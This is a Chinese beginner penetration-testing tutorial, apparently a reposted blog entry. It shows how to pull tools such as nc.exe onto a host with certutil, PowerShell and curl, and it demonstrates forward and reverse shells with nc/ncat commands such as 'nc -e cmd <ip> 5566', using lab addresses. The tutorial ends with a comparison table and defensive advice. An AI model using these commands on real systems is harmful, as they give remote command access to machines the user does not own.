当前位置: 首页 > news >正文

010501上传下载_反弹shell-渗透命令-基础入门-网络安全

文章目录

    • 1 上传下载
    • 2 反弹shell命令
      • 1. 正向连接(Forward Connection)
        • 正向连接示例(nc)
      • 2. 反向连接(Reverse Connection)
        • 反向连接示例(反弹 Shell)
      • 对比表格
      • 实际应用中的选择
      • 防御建议
      • 总结
      • 结语

1 上传下载

解决问题:无图形化、数据传输。

案例演示:参考连接1命令在windows与linux之间相互下载文件,文件nc.exe放置在linux web网站根目录下

命令生成:参考下面连接1

Linuxwget,curl,python,ruby,perl,java

windowsPowerShell,Certutil,Bitsadmin,msiexec,mshta,rundll32

windows下载测试1:

certutil.exe -urlcache -split -f http://ip:port/nc.exe nc1.exe

如下图所示:在这里插入图片描述

windows下载测试2:

powershell.exe -Command "Invoke-WebRequest -Uri http://ip:port/nc.exe -OutFile nc2.exe"

如下图所示:在这里插入图片描述

linux下载测试1:

curl http://ip:port/nc.exe -o nc1.exe

如下图所示:在这里插入图片描述

2 反弹shell命令

反弹 Shell(Reverse Shell)是一种网络技术,通常用于通过远程控制的方式连接目标计算机。

解决问题:数据回显、数据通讯。

命令生成:https://forum.ywhack.com/shell.php

正向连接和反向连接是网络通信中两种不同的连接方向模式,尤其在渗透测试、远程控制等场景中常被讨论。以下是它们的核心区别和应用场景:


1. 正向连接(Forward Connection)

  • 定义:客户端主动连接服务器(攻击者→目标)。
    示例:常规的 SSH 登录、访问网站、下载文件等。
  • 特点
    • 客户端主动发起请求,服务端监听端口等待连接。
    • 依赖条件:目标机器(服务端)需开放端口且允许入站流量(如防火墙放行)。
  • 典型应用场景
    • 正常服务访问(如 Web 服务、数据库连接)。
    • 渗透测试中直接连接目标开放的服务(如爆破 SSH 弱口令)。
正向连接示例(nc)

linux控制windows

  • windows绑定cmd到本地5566端口

    nc -e cmd -lvp 5566
    
  • linux主动连接目标5566

    ncat 192.168.0.104 5566
    

如下图所示:

在这里插入图片描述

window控制linux

  • linux绑定sh到本地5566端口

    ncat -e /bin/sh -lvp 5566
    
  • window主动连接linux5566端口

    nc 192.168.0.105 5566
    

如下图所示:

在这里插入图片描述


2. 反向连接(Reverse Connection)

  • 定义:服务端(目标)主动连接客户端(攻击者)。
    示例:反弹 Shell、木马回连控制端。
  • 特点
    • 服务端(目标)主动向外发起连接,客户端(攻击者)监听端口等待连接。
    • 依赖条件:攻击者需开放监听端口,且目标允许出站流量(通常防火墙对出站限制较少)。
  • 典型应用场景
    • 绕过防火墙或 NAT 限制(如内网机器无法直接暴露端口)。
    • 渗透测试中维持权限(通过反向通道控制目标)。
反向连接示例(反弹 Shell)

windows反向连接linux:

  • linux开启监听5566

    ncat -lvp 5566
    
  • windows给linux连接

    nc -e cmd 192.168.0.105 5566
    

如下图所示:

在这里插入图片描述


对比表格

特性正向连接反向连接
连接方向客户端→服务端服务端→客户端
防火墙限制依赖目标开放入站端口依赖目标允许出站流量
典型场景正常服务访问、直接攻击绕过防火墙、权限维持
攻击者角色主动连接目标被动监听,等待目标回连
风险防御限制入站端口监控异常出站连接

实际应用中的选择

  1. 正向连接适用场景
    • 目标机器有公网 IP 且开放端口。
    • 直接利用漏洞攻击开放服务(如 Web RCE)。
  2. 反向连接适用场景
    • 目标处于内网,无法直接访问(如 NAT 环境)。
    • 防火墙阻止入站流量但允许出站(如企业内网主机)。

防御建议

  • 正向连接防御
    • 限制非必要端口的入站规则(如仅开放 80/443)。
    • 使用强密码和双因素认证(防止爆破)。
  • 反向连接防御
    • 监控异常出站连接(如非业务 IP 的主动外连)。
    • 限制出站流量(仅允许访问白名单 IP/端口)。
    • 部署 EDR/XDR 检测反弹 Shell 行为。

总结

  • 正向连接:直接、简单,但依赖目标环境开放入站权限。
  • 反向连接:隐蔽、灵活,常用于绕过网络限制,但需依赖目标的出站策略。

结语

❓QQ:806797785

⭐️仓库地址:https://gitee.com/gaogzhen

⭐️仓库地址:https://github.com/gaogzhen

[1]全栈网络安全 | 渗透测试 | 高级红蓝对抗 V2024最新版[CP/OL].

[2]棱角社区[CP/OL].

相关文章:

  • C++ 继承的相关内容 基类和派生类 默认成员函数的区别等问题
  • 机器学习k近邻,高斯朴素贝叶斯分类器
  • 将 Docker 镜像从服务器A迁移到服务器B的方法
  • 【Axure结合Echarts绘制图表】
  • “安康杯”安全生产知识竞赛活动流程方案
  • ATPrompt方法:属性嵌入的文本提示学习
  • 本周 edu教育邮箱注册可行方案
  • 车载通信网络 --- 传统车载网络及其发展
  • 【C++高级主题】异常处理(四):auto_ptr类
  • C++异步日志系统
  • 力扣 155.最小栈
  • sqli-labs第二十七关——Trick with selectunion
  • Queue 与 Deque 有什么区别?
  • 人工智能第一币AISPF,首发BitMart交易所
  • C++笔记-哈希表
  • etcd之etcd curl命令(七)
  • 《反事实棱镜:折射因果表征学习的深层逻辑》
  • AI时代新词-私有数据与AI结合的技术:隐私保护与数据利用的平衡
  • 多头注意力 vs 单头注意力:计算量与参数量区别
  • 游戏行业DDoS防护:基于IP信誉库的实时拦截方案
  • 网络公司网站模版/优化大师电脑版下载
  • 西安网站优化维护/优化网站界面的工具
  • 做视频网站教程/武汉千锋教育培训机构怎么样
  • 网站开发二线城市/湖南关键词优化品牌价格
  • 品牌网站建设策划/江苏免费关键词排名外包
  • 黄平网站建设/百度关键词自然排名优化公司